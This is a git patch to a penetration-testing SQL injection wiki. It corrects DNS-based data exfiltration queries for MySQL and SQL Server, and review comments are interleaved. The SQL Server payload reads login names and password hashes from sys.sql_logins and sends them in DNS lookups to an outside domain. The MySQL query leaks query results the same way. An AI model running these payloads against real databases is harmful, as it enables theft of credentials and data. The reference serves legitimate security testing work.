From e643ac8caa23d24bd295127677df11f3517ce430 Mon Sep 17 00:00:00 2001
From: Ian Williams
Date: Sat, 20 Oct 2018 13:31:44 -0500
Subject: [PATCH] Fix DNS-related exfiltration issues. (#6)
* Fix MySQL DNS Request Add missing period. Works on NetSPI/SQLInjectionWiki#5.
* Fix SQL Server DNS request Add missing period. Works on NetSPI/SQLInjectionWiki#5.
* Add contributors entry https://github.com/NetSPI/SQLInjectionWiki/pull/6#issuecomment-431399072 Works on NetSPI/SQLInjectionWiki#5.
---
 README.md | 1 +
 attackQueries/dataExfiltration/mysql.html | 2 +-
 attackQueries/dataExfiltration/sqlserver.html | 2 +-
 3 files changed, 3 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index dcbefb1..8db78cc 100644
--- a/README.md
+++ b/README.md
@@ -14,6 +14,7 @@ See [CONTRIBUTING.md](https://github.com/NetSPI/WikiJekyllTheme/blob/master/CONT
 - Ben Tindell
 - Colin Salisbury
 - Eric Gruber (@egru)
+- Ian Williams (@aph3rson)
 - Jake Reynolds (@jreynoldsdev)
 - Khai Tran (@k_tr4n)
 - Rafael Seferyan
diff --git a/attackQueries/dataExfiltration/mysql.html b/attackQueries/dataExfiltration/mysql.html
index b1d832f..8ea22f3 100644
--- a/attackQueries/dataExfiltration/mysql.html
+++ b/attackQueries/dataExfiltration/mysql.html
@@ -13,7 +13,7 @@

Data Exfiltration

DNS Request
- SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), 'yourhost.com\\'))
+ SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\'))
SMB Share
diff --git a/attackQueries/dataExfiltration/sqlserver.html b/attackQueries/dataExfiltration/sqlserver.html
index 3bad19b..a813cce 100644
--- a/attackQueries/dataExfiltration/sqlserver.html
+++ b/attackQueries/dataExfiltration/sqlserver.html
@@ -13,7 +13,7 @@
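Review bot: The corrected `DNS Request` row in mysql.html still says nothing about the preconditions or the settings that restrict it, so a reader using the page for hardening has nothing to check against. Consider a caption under the query such as `Requires the FILE privilege and a Windows host resolving UNC paths; a restrictive secure_file_priv setting and blocking outbound DNS/SMB from the database server limit it.` The placeholder `yourhost.com` is also a registrable domain, so a reserved name such as `example.com` would keep an unedited paste from sending lookups to a third party. The table markup around the row is not visible in this hunk, so placement is left to the author.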

Data Exfiltration

Make DNS Request - DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"'); + DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"'); UNC Path (DNS Request)
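Review bot: The new `select @host = ...` line keeps the live domain `netspi.com` as a hard-coded literal, whereas the MySQL page in this same patch uses the placeholder `yourhost.com`. Anyone who runs the sample unmodified during an authorized test would send login names and password-hash material from `sys.sql_logins` in DNS lookups towards a zone they do not operate. I would replace the literal with an obvious placeholder, e.g. `+ '.YOUR_DOMAIN' from sys.sql_logins;`, and say in the row text that it has to be substituted before use. The rest of the table row lies outside this hunk, so any wording there could not be checked.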